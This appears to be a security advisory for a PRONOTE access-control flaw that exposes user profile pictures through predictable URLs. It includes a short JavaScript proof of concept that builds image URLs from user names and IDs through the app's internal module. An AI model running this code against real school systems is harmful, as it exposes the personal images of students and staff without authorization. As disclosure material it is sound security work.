PRONOTE - 202X.X.X < 2025.2.8
An Incorrect Access Control vulnerability exists in INDEX-EDUCATION PRONOTE prior to 2025.2.8. The affected components (composeUrlImgPhotoIndividu) allow the construction of direct URLs to user profile images based solely on predictable identifiers such as user IDs and names. Due to missing authorization checks and lack of rate-limiting when generating or accessing these URLs, an unauthenticated or unauthorized actor may retrieve profile pictures of users by crafting requests with guessed or known identifiers.
const arr = [] // List of users
const base = "https://demo.index-education.net/pronote";
IE.fModule({
f: function (exports, require, module, global) {
const ObjetElement = require("ObjetElement");
const AccesApp = global.GApplication;
const comm = AccesApp.communication;
for (const obj of arr) {
const path = comm.composeUrlFichierExterne(
obj.L.replace(/[\s]/gi, "_") + ".jpg",
new ObjetElement.ObjetElement("", obj.N)
);
const url = `${base}/${path}`;
console.log(url);
}
},
fn: "testIEmodule.js",
});